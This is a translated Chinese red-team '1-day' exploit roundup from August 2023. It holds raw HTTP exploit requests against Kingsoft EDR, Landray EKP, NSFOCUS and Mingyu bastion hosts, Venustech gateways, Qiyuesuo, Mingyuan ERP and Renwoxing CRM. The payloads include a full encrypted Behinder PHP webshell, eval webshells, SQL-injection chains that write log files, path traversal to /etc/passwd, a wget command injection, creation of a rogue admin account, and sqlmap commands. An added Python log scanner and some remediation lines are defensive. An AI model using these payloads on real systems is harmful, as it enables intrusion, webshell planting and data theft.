HW Intel - 2023-08-18 - 1day Roundup

月影
2023-08-18

Kingsoft (金山) EDR RCE vulnerability

Enable logging: /Console/inter/handler/change_white_list_cmd.php, id parameter

POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1
Host: *.*.*.*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 131
Origin: http://*.*.*.*
Connection: close
Referer: http://*.*.*.*/settings/system/user.php?m1=7&m2=0

{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set//global//general_log=on;","type":"0"}}


Set the log file to a PHP file

POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1
Host: *.*.*.*
Content-Length: 195
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/114.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://*.*.*.*
Referer: http://*.*.*.*/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SKYLARa0aedxe9e785feabxae789c6e03d=tf2xbucirlmkuqsxpg4bqaq0snb7
Connection: close

{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set//global//general_log_file=0x2e2e2f2e2e2f436f6e736f6c652f636865636b5f6c6f67696e322e706870;","type":"0"}}


Write PHP code
POST /inter/ajax.php?cmd=settings_distribute_cmd HTTP/1.1
Host: *.*.*.*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 222
Origin: http://*.*.*.*
Connection: close
Referer: http://*.*.*.*/index.php
{"settings_distribute_cmd":{"userSession":"{BD435CCE-3F91-E1AA-3844-76A49EE862EB}","mode_id":"3AF264D9-AE5A-86F0-6882-DD7F56827017","settings":"3AF264D9-AE5A-86F0-6882-DD7F56827017_0","SC_list":{"a":"<?php phpinfo();?>"}}}


Finally, a GET request triggers the RCE:
http://*.*.*.*/check_login2.php

Kingsoft Endpoint Security System V9 arbitrary file upload vulnerability

POST /inter/software_relation.php HTTP/1.1 
Host: 192.168.249.137:6868 
Content-Length: 1557 
Pragma: no-cache 
Cache-Control: no-cache 
Upgrade-Insecure-Requests: 1 
Origin: http://192.168.249.137:6868 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxRP5VjBKdqBrCixM 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 
Accept-Encoding: gzip, deflate 
Accept-Language: zh-CN,zh;q=0.9 
Connection: close ------WebKitFormBoundaryxRP5VjBKdqBrCixM 
Content-Disposition: form-data; name="toolFileName" ../../datav.php ------WebKitFormBoundaryxRP5VjBKdqBrCixM 
Content-Disposition: form-data; name="toolDescri" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="id" ------WebKitFormBoundaryxRP5VjBKdqBrCixM 
Content-Disposition: form-data; name="version" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="sofe_typeof" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="fileSize" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="param" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="toolName" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="toolImage"; filename="3.php" Content-Type: image/png <?php @error_reporting(0); session_start(); $key="e45e329feb5d925b"; //rebeyond $_SESSION['k']=$key; session_write_close(); $post=file_get_contents("php://input"); if(!extension_loaded('openssl')) { $t="base64_"."decode"; $post=$t($post.""); for($i=0;$i<strlen($post);$i++) { $post[$i] = $post[$i]^$key[$i+1&15]; } } else { $post=openssl_decrypt($post, "AES128", $key); } $arr=explode('|',$post); $func=$arr[0]; $params=$arr[1]; class C{public function __invoke($p) {eval($p."");}} @call_user_func(new C(),$params); ?> ------WebKitFormBoundaryxRP5VjBKdqBrCixM

Landray (蓝凌) EKP remote code execution vulnerability

Affected versions:
Landray EKP V16 (latest) is affected by a remote code execution vulnerability; V15 has not been verified for lack of a test environment and may also be affected.
Remediation:
Use network ACLs to restrict which sources can reach the OA system, strengthen monitoring, and focus on blocking GET requests whose URLs carry directory-traversal features such as ../.


Front-end (unauthenticated) vulnerability: file upload --> unzip --> obtain a webshell.
Vulnerable path:
/api///sys/ui/sys_ui_extend/sysUiExtend.do

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: /
Connection: Keep-Alive
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
var={"body":{"file":"file:///etc/passwd"}}

Landray OA front-end code execution

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: *.*.*.*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: /
Connection: Keep-Alive
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

var={"body":{"file":"file:///etc/passwd"}}

NSFOCUS (绿盟) NF Next-Generation Firewall arbitrary file upload vulnerability

POST /api/v1/device/bugsInfo HTTP/1.1
Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef
Host:
--4803b59d015026999b45993b1245f0ef
Content-Disposition: form-data; name="file"; filename="compose.php"
<?php eval($_POST['cmd']);?>
--4803b59d015026999b45993b1245f0ef--
POST /mail/include/header_main.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71
Host:
cmd=phpinfo();

NSFOCUS SAS Security Audit System arbitrary file read

/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd

GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1
Host: xxx.xxx.xxx.xxx:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close

NSFOCUS SAS bastion host Exec remote command execution vulnerability

GET /webconf/Exec/index?cmd=wget%20xxx.xxx.xxx HTTP/1.1
Host: xxx.xxx.xxx.xxx:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close

NSFOCUS SAS bastion host GetFile arbitrary file read vulnerability

Including www/local_user.php through this vulnerability allows logging in as an arbitrary user.

/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd

NSFOCUS SAS bastion host local_user.php arbitrary user login vulnerability

/api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin

Mingyu (明御) Operations Audit and Risk Control System (bastion host) arbitrary user registration

POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1
Host: xxx.xxx.xxx.xxx:port
Cookie: LANG=zh;
USM=0a0e1f29d69f4b9185430328b44ad990832935dbf1b90b8769d297dd9f0eb848
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99","Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 1121

<?xml
version="1.0"?><methodCall><methodName>web.user_add</methodName><params
><param><value><array><data><value><string>admin</string></value><value
><string>5</string></value><value><string>XX.XX.XX.XX</string></value><
/data></array></value></param><param><value><struct><member><name>uname
</name><value><string>deptadmin</string></value></member><member><name>
name</name><value><string>deptadmin</string></value></member><member><n
ame>pwd</name><value><string>Deptadmin@123</string></value></member><me
mber><name>authmode</name><value><string>1</string></value></member><me
mber><name>deptid</name><value><string></string></value></member><membe
r><name>email</name><value><string></string></value></member><member><n
ame>mobile</name><value><string></string></value></member><member><name
>comment</name><value><string></string></value></member><member><name>r
oleid</name><value><string>101</string></value></member></struct></valu
e></param></params></methodCall>

Mingyuan Cloud (明源云) ERP ApiUpdate.ashx file upload vulnerability

POST /myunke/ApiUpdateTool/ApiUpdate.ashx?apiocode=a HTTP/1.1
Host: target.com
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3)AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 856

{{unquote("PK\x03\x04\x14\x00\x00\x00\x08\x00\xf2\x9a\x0bW\x97\xe9\x8br\x8c\x00\x00\x00\x93\x00\x00\x00\x1e\x00\x00\x00../../../fdccloud/_/check.aspx$\xcc\xcb\x0a\xc20\x14\x04\xd0_\x09\x91B\xbb\x09\x0a\xddH\xab\x29\x8aP\xf0QZ\xc4\xf5m\x18j!ib\x1e\x82\x7fo\xc4\xdd0g\x98:\xdb\xb1\x96F\xb03\xcdcLa\xc3\x0f\x0b\xce\xb2m\x9d\xa0\xd1\xd6\xb8\xc0\xae\xa4\xe1-\xc9d\xfd\xc7\x07h\xd1\xdc\xfe\x13\xd6%0\xb3\x87x\xb8\x28\xe7R\x96\xcbr5\xacyQ\x9d&\x05q\x84B\xea\x7b\xb87\x9c\xb8\x90m\x28<\xf3\x0e\xaf\x08\x1f\xc4\xdd\x28\xb1\x1f\xbcQ1\xe0\x07EQ\xa5\xdb/\x00\x00\x00\xff\xff\x03\x00PK\x01\x02\x14\x03\x14\x00\x00\x00\x08\x00\xf2\x9a\x0bW\x97\xe9\x8br\x8c\x00\x00\x00\x93\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00../../../fdccloud/_/check.aspxPK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00L\x00\x00\x00\xc8\x00\x00\x00\x00\x00")}}

WeCom (企业微信) 0day: agentinfo endpoint secret disclosure

app="Tencent-企业微信"

1. Reset the secret in the WeCom admin console.
2. Add a WAF rule denying access to the vulnerable endpoint /cgi-bin/gateway/agentinfo.

With this secret, the WeCom API can be used to obtain a WeCom access token; an administrator's token allows calling the enterprise's API directly, i.e. performing WeCom administrator actions.

WeCom zero-day attack incident: the WeCom endpoint XXX.com/cgi-bin/gateway/agentinfo returns the WeCom secret and other sensitive information without authorization. This can lead to the enterprise's full WeCom data being obtained, files being retrieved, and WeCom lightweight apps being used to send phishing files and links to internal staff. The temporary mitigation is to block /cgi-bin/gateway/agentinfo at the WAF; contact the WeCom team for emergency response. All units are asked to strengthen their defenses.

Affected versions: 2.5.x, 2.6.930000 and below;
Not affected: 2.7.x, 2.8.x, 2.9.x.
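The Landray remediation above recommends blocking requests whose URL carries directory-traversal features such as ../, and the WeCom advisory recommends blocking /cgi-bin/gateway/agentinfo at the WAF. The following is an added example of how a defender would check web access logs for those two patterns; it is not code from the original post or from any of the vendors named here. It assumes Combined Log Format lines (the sample lines are constructed for the example), percent-decodes targets repeatedly so that single- and double-encoded traversal such as %2E%2E and %252e%252e is caught, and uses a watch list of endpoints taken from this roundup.

```python
"""Flag traversal-style requests and hits on watched endpoints in access logs.

Added example, not from the original post. Log lines are constructed.
"""
from __future__ import annotations

import re
from urllib.parse import unquote

# Endpoints named in this roundup that a defender would alert on outright.
WATCHED_PATHS = (
    "/cgi-bin/gateway/agentinfo",             # WeCom secret disclosure
    "/webconf/Exec/index",                    # NSFOCUS SAS bastion Exec RCE
    "/webconf/GetFile/index",                 # NSFOCUS SAS bastion GetFile read
    "/myunke/ApiUpdateTool/ApiUpdate.ashx",   # Mingyuan Cloud ERP upload
)

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# "../", "..\" and the "..;/" variant seen in the Qiyuesuo request above.
TRAVERSAL_RE = re.compile(r"\.\.(?:/|;)")


def normalize(target: str) -> str:
    """Percent-decode up to three times so double-encoded traversal is caught."""
    prev, cur = None, target
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return cur.replace("\\", "/")


def classify(target: str) -> list[str]:
    """Return the reasons a request target should be flagged (empty if benign)."""
    reasons: list[str] = []
    decoded = normalize(target)
    path = decoded.split("?", 1)[0]
    if TRAVERSAL_RE.search(decoded):
        reasons.append("path-traversal")
    for watched in WATCHED_PATHS:
        if watched in path:
            reasons.append(f"watched-endpoint:{watched}")
            break
    return reasons


def scan(log_text: str) -> list[dict]:
    """Parse Combined Log Format lines and return only the flagged requests."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        reasons = classify(m["target"])
        if reasons:
            findings.append({
                "ip": m["ip"],
                "method": m["method"],
                "target": m["target"],
                "status": int(m["status"]),
                "reasons": reasons,
            })
    return findings


# Constructed sample log: three entries mirror requests from this roundup,
# one is benign, one is a double-encoded traversal attempt.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Aug/2023:10:01:02 +0800] "GET /webconf/GetFile/index?path=../../../../etc/passwd HTTP/1.1" 200 1432
10.0.0.6 - - [18/Aug/2023:10:01:05 +0800] "POST /callback/%2E%2E;/code/upload HTTP/1.1" 200 53
10.0.0.7 - - [18/Aug/2023:10:01:09 +0800] "GET /cgi-bin/gateway/agentinfo HTTP/1.1" 200 812
10.0.0.8 - - [18/Aug/2023:10:01:12 +0800] "GET /index.php?m1=7&m2=0 HTTP/1.1" 200 2048
10.0.0.9 - - [18/Aug/2023:10:01:15 +0800] "GET /static/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 404 0
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["method"]} {hit["target"]} -> {", ".join(hit["reasons"])}')
```

Run it against a real access log by passing the file contents to scan(); the status code is kept in each finding so that a 200 on a watched endpoint can be prioritised over a 404. The decode loop is bounded because each unquote pass either changes the string or stops, which avoids pathological inputs looping forever.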

Venustech Tianyue (天钥) Security Gateway front-end SQL injection

POST /ops/index.php?c=Reportguide&a=checkrn HTTP/1.1
Host: xxx.xxx.xxx.xxx:port
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="88", "Google Chrome";v="88", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Language: zh-CN,zh;q=0.9
Cookie: ****
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
checkname=123&tagid=123

sqlmap -u "https://xxx.xxx.xxx.xxx:port/ops/index.php?c=Reportguide&a=checkrn" --data "checkname=123&tagid=123" -v3 --skip-waf --random-agent

Venustech 4A Unified Security Management Platform getMaster information disclosure

Success condition: response status code 200 and response body containing the keyword "\"state\":true"

GET /accountApi/getMaster.do HTTP/1.1
Host: [your hostname or IP address]
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.881.36 Safari/537.36

poc:
  relative: req0
  session: false
  requests:
  - method: GET
    timeout: 10
    path: /accountApi/getMaster.do
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
        like Gecko) Chrome/65.0.881.36 Safari/537.36
    follow_redirects: true
    matches: (code.eq("200") && body.contains("\"state\":true"))

Remediation:
Restrict file access.

Qiyuesuo (契约锁) Electronic Signature System RCE

POST /callback/%2E%2E;/code/upload HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type:multipart/form-data;

boundary=----GokVTLZMRxcJWKfeCvEsYHlszxE
----GokVTLZMRxcJWKfeCvEsYHlszxE
Content-Disposition: form-data; name="type";

TIMETASK
----GokVTLZMRxcJWKfeCvEsYHlszxE
Content-Disposition: form-data; name="file"; filename="qys.jpg"

(webshell payload)

----GokVTLZMRxcJWKfeCvEsYHlszxE

Renwoxing (任我行) CRM SmsDataList SQL injection vulnerability

POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.1361.63 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 170

Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=00000000*

Renwoxing CRM system SQL injection vulnerability

For details, see the original article, which includes reproduction screenshots.
Original link: https://mp.weixin.qq.com/s/01uVhwihuwIvpAIrJT4SyQ

The Renwoxing CRM SmsDataList endpoint has a SQL injection vulnerability; an unauthenticated attacker can use it to obtain sensitive database information and credentials, which may ultimately lead to server compromise.


POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.1361.63 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 170

Keywords=&StartSendDate=2023-07-17&EndSendDate=2023-08-10&SenderTypeId=0000000000*

The SenderTypeId parameter is injectable: the injection can be closed off after the value 0000000000, or the request can be fed directly to sqlmap for verification.